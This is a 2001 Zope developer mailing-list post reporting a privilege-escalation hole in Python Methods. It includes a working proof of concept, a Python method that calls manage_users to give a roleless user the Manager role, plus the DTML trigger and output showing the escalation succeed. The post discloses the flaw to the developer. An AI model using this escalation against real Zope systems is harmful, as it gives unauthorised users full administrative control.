[Zope-dev] python methods & zope - security hole ?

Joseph Wayne Norton norton@alum.mit.edu
Wed, 31 Jan 2001 15:20:58 +0900


Evan -

I believe I have found a situation while using python methods that
exposes a security hole.  A user that can create python methods can
grant the Manager role to himself by simply writing and then calling
the manage_users method.  This issue might also apply to other
scenarios.

I created a simple test case to check the behavior ...

  - create a user without any roles in a acl_users folder (see below)

  - create a python method such as the one below that grants root
    access to the user (see below)

  - create a dtml method that calls the python method .... this method
    should have view and access content information granted (see
    below) to the user created in the first step.  In my case, I'm
    simply using the anonymous role ... but it could be another role
    setup for developers, content editors, etc.

  - execute the dtml method (see below)

I also created a similiar test case for dtml methods and the dtml
method behaved as I expected .... preventing the user from obtaining
the manage_users role because they do not have the role in the first
place.

I just want to confirm if this is a known issue or a new issue (or
feature or mistake in my zope setup).  I'm currently running with zope
2.2.5 and python methods 0-1-7. If this is indeed an issue, it might
be worthwhile to simply document this issue on the PythonMethods
product page.

thanks,

- joe n.

###############################################################################
# Here is the output of this behavior ...
UserName: dummy_non_manager
Roles: ()
Has 'View' ?: 0
Has 'Manage users' ?: 0
user 'dummy_non_manager' roles '['Manager']' 
user 'dummy_manager' roles '['Manager']' 
UserName: dummy_non_manager
Roles: ('Manager',)
Has 'View' ?: 1
Has 'Manage users' ?: 1

###############################################################################
# Here is the python method
args: self,REQUEST

body:
ret = ''
users = {'dummy_manager' : ['Manager'],'dummy_non_manager' : ['Manager']}
for u in users.keys():
    roles = users.get(u)
    REQUEST.set('name', u)
    REQUEST.set('roles', roles)
    self.acl_users.manage_users('Change',REQUEST)
    ret = ret + ('user \'%s\' roles \'%s\' <br>\n' % (u, roles))
return ret

###############################################################################
# Here is the dtml method:
<dtml-var standard_html_header>

UserName:             <dtml-var
"REQUEST['AUTHENTICATED_USER'].getUserName()"><br>
Roles:                <dtml-var
"REQUEST['AUTHENTICATED_USER'].getRoles()"><br>
Has 'View' ?:         <dtml-var
"REQUEST['AUTHENTICATED_USER'].has_permission('View',REQUEST['AUTHENTICATED_USER'])"><br>
Has 'Manage users' ?: <dtml-var
"REQUEST['AUTHENTICATED_USER'].has_permission('Manage
users',REQUEST['AUTHENTICATED_USER'])"><br>

<dtml-var "acl_users_roles_python_method(REQUEST)">

UserName:             <dtml-var
"REQUEST['AUTHENTICATED_USER'].getUserName()"><br>
Roles:                <dtml-var
"REQUEST['AUTHENTICATED_USER'].getRoles()"><br>
Has 'View' ?:         <dtml-var
"REQUEST['AUTHENTICATED_USER'].has_permission('View',REQUEST['AUTHENTICATED_USER'])"><br>
Has 'Manage users' ?: <dtml-var
"REQUEST['AUTHENTICATED_USER'].has_permission('Manage
users',REQUEST['AUTHENTICATED_USER'])"><br>

<dtml-var standard_html_footer>

-- 

--
Joseph Norton

norton@alum.mit.edu
+81-3-3822-6936
2-10-7 Tabata, Kita-ku, Tokyo 114-0014, Japan ($B")(B114-0014  $BEl5~ETKL6hEDC<#2CzL\(B10-7)